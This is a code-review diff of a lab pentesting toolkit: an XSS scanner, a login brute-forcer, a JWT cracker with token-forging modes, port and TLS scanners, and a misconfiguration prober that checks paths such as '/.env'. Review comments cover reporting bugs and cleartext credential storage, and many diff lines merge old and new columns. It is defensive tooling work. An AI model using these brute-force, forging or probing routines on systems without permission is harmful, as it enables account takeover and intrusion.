cspResult := scanner.CheckCSP(*target) if *format == "text" && cspResult["has_csp"].(bool) {
if cspResult["has_csp"].(bool) {
fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))]) fmt.Printf("%s[+]%s CSP configured: %s\n", colorGreen, colorEnd, cspResult["csp"].(string)[:min(100, len(cspResult["csp"].(string)))])
for _, w := range cspResult["weaknesses"].([]string) { for _, w := range cspResult["weaknesses"].([]string) {
fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w) fmt.Printf("%s[-]%s Weakness: %s\n", colorYellow, colorEnd, w)
} }
} else { } else if *format == "text" {
fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd) fmt.Printf("%s[-]%s No CSP configured!\n", colorYellow, colorEnd)
} }
} }
domResults := []map[string]string{}
if *domScan { if *domScan {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd) domResults = scanner.ScanDOMXSS(*target)
domResults := scanner.ScanDOMXSS(*target) if *format == "text" {
fmt.Printf("\n%s[*]%s Scanning for DOM XSS...\n", colorCyan, colorEnd)
}
for _, r := range domResults { for _, r := range domResults {
if *format != "text" {
continue
}
fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"]) fmt.Printf("%s[-]%s Potential DOM XSS: %s\n", colorYellow, colorEnd, r["desc"])
} }
} }
fmt.Printf("\n%s[*]%s Testing XSS payloads...\n", colorCyan, colorEnd)
results := scanner.ScanURL(*target, *method, *param) results := scanner.ScanURL(*target, *method, *param)
report := map[string]interface{}{
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) "tool": "xss-scanner-go",
fmt.Printf("%s[SUMMARY]%s Found %d XSS vulnerabilities\n", colorGreen, colorEnd, len(results)) "mode": "bulk-reflected-xss",
for _, r := range results { "target": *target,
fmt.Printf(" - [%s] %s: %s\n", r.Category, r.Type, r.Payload[:min(50, len(r.Payload))]) "status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads},
"payload_or_probe": map[string]interface{}{"reflected_hits": results, "dom_hits": domResults, "csp": cspResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "low",
"run_id": *runID,
"case_id": *caseID,
} }
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) if len(results) > 0 {
report["status"] = "verified"
report["severity"] = "high"
} else if len(domResults) > 0 {
report["status"] = "suspected"
report["severity"] = "medium"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/xss-scanner-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
text := []string{
strings.Repeat("=", 60),
"XSS Scanner (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Method: " + *method,
fmt.Sprintf("Reflected Hits: %d", len(results)),
fmt.Sprintf("DOM Findings: %d", len(domResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(text, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
} }
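Review bot: The new authorization gate reuses the target-missing message: `if *target == "" || !*ackAuthorized` prints "Target URL is required. Use -u flag." even when `-u` was given and only `-ack-authorized` is missing, so the operator is not told why the scan was refused; split it into its own check, `if !*ackAuthorized { fmt.Printf("%s[ERROR]%s Pass -ack-authorized to confirm the target is owned or authorized.\n", colorRed, colorEnd); return }`. `report["evidence_refs"]` is also appended with `evidencePath` regardless of whether `os.WriteFile` succeeded, since its error is discarded, so the report may cite a file that was never written; test the error before appending. In text mode the "Scanning for DOM XSS..." banner is now printed after `scanner.ScanDOMXSS` has already run (the call precedes the print), so swapping the two statements restores the progress message's purpose.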


@@ -28,6 +28,21 @@ from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import re import re
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -249,14 +264,21 @@ def main():
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)") parser.add_argument("--delay", type=float, default=0, help="请求延迟(秒)")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
bruteforcer = WebBruteForcer( bruteforcer = WebBruteForcer(
threads=args.threads, timeout=args.timeout, delay=args.delay threads=args.threads, timeout=args.timeout, delay=args.delay
) )
bruteforcer.session.headers.update(parse_headers(args.header))
if args.proxy:
bruteforcer.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
bruteforcer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
usernames = [] usernames = []
if args.userlist: if args.userlist:
@@ -276,10 +298,6 @@ def main():
bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)") bruteforcer.print_result("ERROR", "请提供密码 (--pass 或 -P)")
sys.exit(1) sys.exit(1)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Web Brute Force Tool{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
bruteforcer.print_result("INFO", f"目标: {args.url}") bruteforcer.print_result("INFO", f"目标: {args.url}")
bruteforcer.print_result("INFO", f"用户数: {len(usernames)}") bruteforcer.print_result("INFO", f"用户数: {len(usernames)}")
bruteforcer.print_result("INFO", f"密码数: {len(passwords)}") bruteforcer.print_result("INFO", f"密码数: {len(passwords)}")
@@ -295,23 +313,45 @@ def main():
data_template=args.data, data_template=args.data,
success_pattern=args.success, success_pattern=args.success,
fail_pattern=args.fail, fail_pattern=args.fail,
verbose=args.verbose, verbose=args.verbose and args.format == "text",
) )
elapsed = time.time() - bruteforcer.start_time elapsed = time.time() - bruteforcer.start_time
rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0 rate = bruteforcer.attempts / elapsed if elapsed > 0 else 0
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
bruteforcer.print_result("INFO", f"总尝试: {bruteforcer.attempts}") ref = write_evidence(
bruteforcer.print_result("INFO", f"耗时: {elapsed:.2f}s ({rate:.1f} req/s)") args,
"web-brute-results.json",
if results: {"results": results, "attempts": bruteforcer.attempts, "elapsed": elapsed, "rate": rate},
bruteforcer.print_result("SUCCESS", f"发现 {len(results)} 个有效凭证!") )
for r in results: if ref:
print(f" - {r['username']}:{r['password']}") evidence_refs.append(ref)
else: status = "verified" if results else "needs-review"
bruteforcer.print_result("INFO", "未发现有效凭证") severity = "high" if results else "medium"
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") report = make_report(
tool="web-brute",
mode="credential-spray-lab",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"results": results, "username_count": len(usernames), "password_count": len(passwords)},
request_summary={"method": args.method, "threads": args.threads, "delay": args.delay, "rate": rate},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"Web Brute Force Tool",
"=" * 60,
f"Target: {args.url}",
f"Attempts: {bruteforcer.attempts}",
f"Elapsed: {elapsed:.2f}s",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
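Review bot: The `print_result` no-op installed for non-text formats (`bruteforcer.print_result = lambda *_args, **_kwargs: None`) also swallows the fatal `ERROR` messages that precede `sys.exit(1)` in the next hunk (the "请提供密码" check), so a JSON-mode run can exit 1 with nothing on stdout or stderr saying why. Make the stub forward `ERROR` calls to stderr instead of dropping every level, or print those two fatal messages with `file=sys.stderr` before the exit. Separately, `results` carries recovered username/password pairs in cleartext into both the evidence file and `payload_or_probe`; `write_evidence` lives in tool_contract outside this diff, so confirm it creates the file with restrictive permissions, or mask the field before persisting, e.g. `[{**r, "password": "<redacted>"} for r in results]`. main() starts outside the hunk.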


@@ -30,6 +30,16 @@ import time
from typing import Dict, Optional, Tuple, List from typing import Dict, Optional, Tuple, List
import sys import sys
import re import re
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -307,57 +317,33 @@ def main():
parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值") parser.add_argument("--kid-injection", default="/dev/null", help="KID 注入值")
parser.add_argument("--analyze", action="store_true", help="分析 JWT") parser.add_argument("--analyze", action="store_true", help="分析 JWT")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
cracker = JWTCracker() cracker = JWTCracker()
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}JWT Cracker & Analyzer{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
try: try:
header, payload, _ = cracker.decode(args.token) header, payload, _ = cracker.decode(args.token)
if args.format == "text":
print(f"{Colors.CYAN}Header:{Colors.END}") print(f"{Colors.CYAN}Header:{Colors.END}")
print(f" {json.dumps(header, indent=2)}") print(f" {json.dumps(header, indent=2)}")
print(f"\n{Colors.CYAN}Payload:{Colors.END}") print(f"\n{Colors.CYAN}Payload:{Colors.END}")
print(f" {json.dumps(payload, indent=2)}") print(f" {json.dumps(payload, indent=2)}")
except Exception as e: except Exception as e:
cracker.print_result("ERROR", str(e)) cracker.print_result("ERROR", str(e))
sys.exit(1) sys.exit(1)
if args.analyze: analysis = cracker.analyze(args.token) if args.analyze else {"issues": []}
print(f"\n{Colors.CYAN}Analysis:{Colors.END}") forged = None
analysis = cracker.analyze(args.token) if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
if "issues" in analysis: elif args.attack == "kid":
for issue in analysis["issues"]: forged = cracker.attack_kid_injection(args.token, args.kid_injection)
color = ( elif args.attack == "confusion":
Colors.RED forged = cracker.attack_algorithm_confusion(args.token)
if issue["severity"] == "HIGH"
else Colors.YELLOW
if issue["severity"] == "MEDIUM"
else Colors.BLUE
)
print(f" {color}[{issue['severity']}]{Colors.END} {issue['issue']}")
print(f" {issue['description']}")
if args.attack:
print(f"\n{Colors.CYAN}Attack: {args.attack}{Colors.END}")
if args.attack == "none":
forged = cracker.attack_none_algorithm(args.token)
cracker.print_result("SUCCESS", f"Forged Token (none): {forged}")
elif args.attack == "kid":
forged = cracker.attack_kid_injection(args.token, args.kid_injection)
cracker.print_result("SUCCESS", f"Forged Token (kid): {forged}")
elif args.attack == "confusion":
forged = cracker.attack_algorithm_confusion(args.token)
cracker.print_result("INFO", "需要公钥来利用算法混淆攻击")
wordlist = None wordlist = None
if args.wordlist: if args.wordlist:
@@ -368,24 +354,62 @@ def main():
cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}") cracker.print_result("ERROR", f"字典文件不存在: {args.wordlist}")
sys.exit(1) sys.exit(1)
print(f"\n{Colors.CYAN}Cracking...{Colors.END}") stdout_buffer = io.StringIO()
capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
start = time.time() start = time.time()
secret = cracker.crack(args.token, wordlist, args.verbose) with capture:
secret = cracker.crack(args.token, wordlist, args.verbose and args.format == "text")
elapsed = time.time() - start elapsed = time.time() - start
if secret: if secret:
cracker.print_result("FOUND", f"密钥破解成功: {secret}")
cracker.print_result("INFO", f"耗时: {elapsed:.2f}s")
forged = cracker.encode(header, payload, secret, header.get("alg", "HS256")) forged = cracker.encode(header, payload, secret, header.get("alg", "HS256"))
cracker.print_result("SUCCESS", f"可以伪造任意 Token")
else:
cracker.print_result(
"WARNING",
f"未能破解密钥 (尝试了 {len(wordlist) if wordlist else len(cracker.common_secrets)} 个)",
)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") evidence_refs = []
ref = write_evidence(
args,
"jwt-analysis.json",
{
"header": header,
"payload": payload,
"analysis": analysis,
"attack": args.attack,
"secret_found": bool(secret),
"captured_stdout": stdout_buffer.getvalue()[-1000:],
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if secret or forged else "needs-review"
severity = "high" if secret else "medium" if analysis.get("issues") else "info"
report = make_report(
tool="jwt-cracker",
mode="jwt-analysis-and-weak-secret-test",
target="jwt-token",
status=status,
severity=severity,
payload_or_probe={
"header": header,
"payload_keys": sorted(payload.keys()),
"issues": analysis.get("issues", []),
"attack": args.attack,
"secret_found": bool(secret),
},
request_summary={"wordlist": args.wordlist or "builtin-common", "elapsed_seconds": round(elapsed, 2)},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
extra={"forged_token_present": bool(forged)},
)
text_lines = [
"=" * 60,
"JWT Cracker & Analyzer",
"=" * 60,
f"Token Alg: {header.get('alg', 'unknown')}",
f"Issues: {len(analysis.get('issues', []))}",
f"Secret Found: {'yes' if secret else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
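Review bot: `status = "verified" if secret or forged else "needs-review"` marks the run as verified whenever `--attack none` or `--attack kid` was requested, because `forged` is assigned the locally constructed token regardless of whether any verifier accepted it, and the removed text output even stated the confusion path needs a public key to mean anything. Only a recovered secret is evidence of a weak key, so this should be `status = "verified" if secret else "needs-review"`, with the attack path recorded in `payload_or_probe` as attempted rather than folded into status. The evidence file's `captured_stdout` slice may also contain the cracked secret if `cracker.crack` prints it (the method is outside this diff), while the structured fields deliberately store only `secret_found`; redact or drop that capture so the two agree. main() starts outside the hunk.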


@@ -0,0 +1,99 @@
#!/usr/bin/env python3
"""
Session / Token Boundary Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import re
import sys
from pathlib import Path
from typing import Any, Dict, List
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
COOKIE_ATTRS = ["HttpOnly", "Secure", "SameSite", "Path", "Domain"]
STORAGE_PATTERNS = {
"localStorage": re.compile(r"localStorage\.(setItem|getItem)|window\.localStorage", re.I),
"sessionStorage": re.compile(r"sessionStorage\.(setItem|getItem)|window\.sessionStorage", re.I),
"token-ish": re.compile(r"(jwt|token|authorization|bearer)", re.I),
}
def analyze(target: str, timeout: float, headers: Dict[str, str]) -> Dict[str, Any]:
response = requests.get(target, timeout=timeout, headers=headers, verify=False)
cookies = []
for raw in response.headers.get("Set-Cookie", "").split(","):
raw = raw.strip()
if not raw:
continue
attrs = {attr: (attr.lower() in raw.lower()) for attr in COOKIE_ATTRS}
cookies.append({"raw": raw[:300], "attributes": attrs})
storage_hits = []
for name, pattern in STORAGE_PATTERNS.items():
if pattern.search(response.text):
storage_hits.append(name)
suspicious_headers = []
for name in ["Set-Cookie", "Authorization", "X-Forwarded-User", "X-Original-URL"]:
if response.headers.get(name):
suspicious_headers.append({"name": name, "value": response.headers.get(name)[:200]})
return {
"status_code": response.status_code,
"cookies": cookies,
"storage_hits": storage_hits,
"suspicious_headers": suspicious_headers,
"body_excerpt": response.text[:600],
}
def main() -> int:
parser = argparse.ArgumentParser(description="Session / Token Boundary Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
findings = analyze(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "session-lab.json", findings)
if ref:
evidence_refs.append(ref)
suspicious = len(findings["cookies"]) + len(findings["storage_hits"]) + len(findings["suspicious_headers"])
report = make_report(
tool="session-lab",
mode="cookie-storage-session-boundary-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe=findings,
request_summary={"timeout": args.timeout, "header_names": sorted(headers.keys())},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Session / Token Boundary Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Cookie Findings: {len(findings['cookies'])}",
f"Storage Hits: {len(findings['storage_hits'])}",
f"Suspicious Headers: {len(findings['suspicious_headers'])}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())


@@ -30,13 +30,22 @@ import socket
import ssl import ssl
import warnings import warnings
from dataclasses import asdict, dataclass, field from dataclasses import asdict, dataclass, field
from pathlib import Path
from typing import Dict, List, Optional, Set from typing import Dict, List, Optional, Set
import sys
warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL") warnings.filterwarnings("ignore", message="urllib3 v2 only supports OpenSSL")
import requests import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, make_report, write_evidence # noqa: E402
DEFAULT_PORTS = [80, 443, 8080, 8443] DEFAULT_PORTS = [80, 443, 8080, 8443]
@@ -226,6 +235,7 @@ def main() -> int:
action="store_true", action="store_true",
help="确认目标属于自有资产或已明确授权", help="确认目标属于自有资产或已明确授权",
) )
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
if not args.ack_authorized: if not args.ack_authorized:
@@ -267,11 +277,25 @@ def main() -> int:
"related_hosts": sorted(related_hosts), "related_hosts": sorted(related_hosts),
} }
if args.json: evidence_refs = []
print(json.dumps(report, indent=2, ensure_ascii=True)) ref = write_evidence(args, "site-scope-map.json", report)
else: if ref:
print(render_text(report)) evidence_refs.append(ref)
return 0 payload = make_report(
tool="site-scope-mapper",
mode="single-target-scope-map",
target=args.target,
status="verified" if report["http"] or report["tls"] else "needs-review",
severity="low",
payload_or_probe=report,
request_summary={"ports": ports, "target_type": target_type},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
if args.json and args.format == "text":
args.format = "json"
return emit_report(args, payload, render_text(report).splitlines())
if __name__ == "__main__": if __name__ == "__main__":
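Review bot: This is the only tool in the commit that wires `add_common_args(parser, include_network=False)` without calling `ensure_authorized(args, parser)` afterwards (the import line at the top of the section omits it too), so whatever gate the shared contract enforces is skipped here and only the local `--ack-authorized` check remains. If the contract flag is meant to supersede `--ack-authorized`, add `ensure_authorized(args, parser)` right after `args = parser.parse_args()` and extend the import; if not, a comment such as `# --ack-authorized is this tool's authorization gate; tool_contract's check is intentionally not applied` would stop the next reader from assuming the two are equivalent. `tool_contract` is outside this diff, so the exact behaviour of the shared flag is inferred. main() starts outside the hunk.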


@@ -0,0 +1,96 @@
#!/usr/bin/env python3
"""
Misconfiguration Lab Tool
LAB ONLY | AUTHORIZED TARGETS ONLY
"""
from __future__ import annotations
import argparse
import sys
from pathlib import Path
from typing import Any, Dict, List
from urllib.parse import urljoin
import requests
SCRIPTS_DIR = Path(__file__).resolve().parents[3] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, parse_headers, write_evidence # noqa: E402
DEFAULT_PATHS = [
"/.env",
"/server-status",
"/actuator/health",
"/swagger-ui.html",
"/phpinfo.php",
"/admin/",
"/debug",
]
def probe(target: str, timeout: float, headers: Dict[str, str]) -> List[Dict[str, Any]]:
results = []
for path in DEFAULT_PATHS:
url = urljoin(target if target.endswith("/") else target + "/", path.lstrip("/"))
try:
response = requests.get(url, timeout=timeout, headers=headers, verify=False)
results.append(
{
"path": path,
"url": url,
"status_code": response.status_code,
"server": response.headers.get("Server"),
"content_type": response.headers.get("Content-Type"),
"body_excerpt": response.text[:300],
}
)
except Exception as exc:
results.append({"path": path, "url": url, "error": str(exc)})
return results
def main() -> int:
parser = argparse.ArgumentParser(description="Misconfiguration Lab Tool")
parser.add_argument("--target", required=True, help="目标 URL")
parser.add_argument("--timeout", type=float, default=8.0, help="请求超时时间")
add_common_args(parser)
args = parser.parse_args()
ensure_authorized(args, parser)
headers = parse_headers(args.header)
results = probe(args.target, args.timeout, headers)
evidence_refs = []
ref = write_evidence(args, "misconfig-lab.json", {"results": results})
if ref:
evidence_refs.append(ref)
suspicious = [item for item in results if item.get("status_code") in {200, 401, 403}]
report = make_report(
tool="misconfig-lab",
mode="misconfiguration-surface-check",
target=args.target,
status="verified" if suspicious else "needs-review",
severity="medium" if suspicious else "info",
payload_or_probe={"results": results, "suspicious": suspicious},
request_summary={"timeout": args.timeout, "paths": DEFAULT_PATHS},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Misconfiguration Lab Tool",
"=" * 60,
f"Target: {args.target}",
f"Paths Checked: {len(DEFAULT_PATHS)}",
f"Suspicious Responses: {len(suspicious)}",
]
return emit_report(args, report, text_lines)
if __name__ == "__main__":
raise SystemExit(main())
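Review bot: `suspicious` treats any 200/401/403 on the seven default paths as a `verified` finding, but a catch-all route or soft-404 page answers 200 for every path, so against such a target every entry is flagged and the report claims a verification the tool never performed. Fetch one control path that should not exist first and mark entries whose status and body length match that baseline, then filter them out of `suspicious`, as below; the unbaselined state is better reported as `status="suspected" if suspicious else "needs-review"`, the vocabulary the Go XSS scanner in this same commit already uses. Separately, `verify=False` is used without suppressing `InsecureRequestWarning`, so each of the seven requests writes a warning to stderr; web-brute in this commit calls `requests.packages.urllib3.disable_warnings()` for this.
```python
CONTROL_PATH = "/__misconfig-lab-control__"  # expected to be absent; used to detect catch-all / soft-404 responses


def probe(target: str, timeout: float, headers: Dict[str, str]) -> List[Dict[str, Any]]:
    base = target if target.endswith("/") else target + "/"
    baseline = None  # (status_code, body length) of the control path; None if it could not be fetched
    try:
        control = requests.get(urljoin(base, CONTROL_PATH.lstrip("/")), timeout=timeout, headers=headers, verify=False)
        baseline = (control.status_code, len(control.text))
    except Exception:
        pass  # no baseline: every hit is reported unfiltered, as before
    results = []
    for path in DEFAULT_PATHS:
        url = urljoin(base, path.lstrip("/"))
        try:
            response = requests.get(url, timeout=timeout, headers=headers, verify=False)
            entry = {
                # … unchanged: path, url, status_code, server, content_type, body_excerpt …
            }
            entry["matches_baseline"] = baseline is not None and (response.status_code, len(response.text)) == baseline
            results.append(entry)
        except Exception as exc:
            results.append({"path": path, "url": url, "error": str(exc)})
    return results


# in main():
suspicious = [item for item in results if item.get("status_code") in {200, 401, 403} and not item.get("matches_baseline")]
```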


@@ -27,6 +27,14 @@ import time
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -229,37 +237,54 @@ def main():
parser.add_argument("-t", "--threads", type=int, default=100, help="线程数") parser.add_argument("-t", "--threads", type=int, default=100, help="线程数")
parser.add_argument("--timeout", type=float, default=1.0, help="超时时间") parser.add_argument("--timeout", type=float, default=1.0, help="超时时间")
parser.add_argument("-v", "--verbose", action="store_true", help="详细输出") parser.add_argument("-v", "--verbose", action="store_true", help="详细输出")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
scanner = PortScanner(threads=args.threads, timeout=args.timeout) scanner = PortScanner(threads=args.threads, timeout=args.timeout)
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
if args.top_ports: if args.top_ports:
ports = scanner.top_ports[: args.top_ports] ports = scanner.top_ports[: args.top_ports]
else: else:
ports = scanner.parse_ports(args.ports) ports = scanner.parse_ports(args.ports)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}Port Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.host}") scanner.print_result("INFO", f"目标: {args.host}")
scanner.print_result("INFO", f"端口: {len(ports)}") scanner.print_result("INFO", f"端口: {len(ports)}")
scanner.print_result("INFO", f"线程: {args.threads}") scanner.print_result("INFO", f"线程: {args.threads}")
results = scanner.scan_host(args.host, ports, args.verbose) results = scanner.scan_host(args.host, ports, args.verbose)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: ref = write_evidence(args, "port-scan-results.json", {"results": results, "ports": ports})
scanner.print_result("SUCCESS", f"发现 {len(results)} 个开放端口:") if ref:
print(f"\n{'PORT':<10} {'SERVICE':<15} {'BANNER'}") evidence_refs.append(ref)
print("-" * 60) status = "verified" if results else "needs-review"
for r in sorted(results, key=lambda x: x["port"]): severity = "medium" if results else "info"
banner = r["banner"][:40] if r["banner"] else r["service"] report = make_report(
print(f"{r['port']:<10} {r['service']:<15} {banner}") tool="port-scanner",
else: mode="minimal-port-scan",
scanner.print_result("INFO", "未发现开放端口") target=args.host,
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") status=status,
severity=severity,
payload_or_probe={"ports": ports, "open_ports": results},
request_summary={"threads": args.threads, "timeout": args.timeout},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"Port Scanner",
"=" * 60,
f"Target: {args.host}",
f"Ports Checked: {len(ports)}",
f"Open Ports: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
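Review bot: `severity = "medium" if results else "info"` rates any open port as a medium finding, so a host legitimately serving 80/443 is reported at the same level as an exposed management service and the severity field carries no triage signal. Open ports alone are inventory rather than a vulnerability; keep `severity = "info"` and let the consumer of `open_ports` (which already carries the banners) escalate, or raise it only when a service name or banner matches an explicit should-not-be-exposed list. As in web-brute, the `print_result` stub installed for non-text output drops every level; if `PortScanner` reports failures through `print_result` (its body is outside this diff) those are lost in JSON mode, so forward `ERROR` calls to stderr instead. main() starts outside the hunk.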


@@ -26,6 +26,14 @@ import re
from typing import Dict, List, Tuple, Optional from typing import Dict, List, Tuple, Optional
from datetime import datetime from datetime import datetime
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import add_common_args, emit_report, ensure_authorized, make_report, write_evidence # noqa: E402
class Colors: class Colors:
@@ -271,74 +279,45 @@ def main():
parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名") parser.add_argument("-u", "--url", required=True, help="目标 URL 或主机名")
parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)") parser.add_argument("-p", "--port", type=int, default=443, help="端口 (默认: 443)")
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser, include_network=False)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0] hostname = args.url.replace("https://", "").replace("http://", "").split("/")[0]
scanner = TLSScanner(timeout=args.timeout) scanner = TLSScanner(timeout=args.timeout)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}TLS Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {hostname}:{args.port}") scanner.print_result("INFO", f"目标: {hostname}:{args.port}")
print(f"\n{Colors.CYAN}[*] 扫描协议支持...{Colors.END}")
results = scanner.scan(hostname, args.port) results = scanner.scan(hostname, args.port)
evidence_refs = []
print(f"\n{Colors.CYAN}协议支持:{Colors.END}") ref = write_evidence(args, "tls-results.json", results)
for proto, supported in results["protocols"].items(): if ref:
status = ( evidence_refs.append(ref)
f"{Colors.GREEN}支持{Colors.END}" severity = "high" if any(issue["severity"] in ["CRITICAL", "HIGH"] for issue in results["issues"]) else "medium" if results["issues"] else "info"
if supported status = "verified" if results["issues"] else "needs-review"
else f"{Colors.RED}不支持{Colors.END}" report = make_report(
) tool="tls-scanner",
if supported and proto in ["SSLv2", "SSLv3"]: mode="tls-readonly-check",
status = f"{Colors.RED}支持 (不安全){Colors.END}" target=f"{hostname}:{args.port}",
elif supported and proto in ["TLSv1.0", "TLSv1.1"]: status=status,
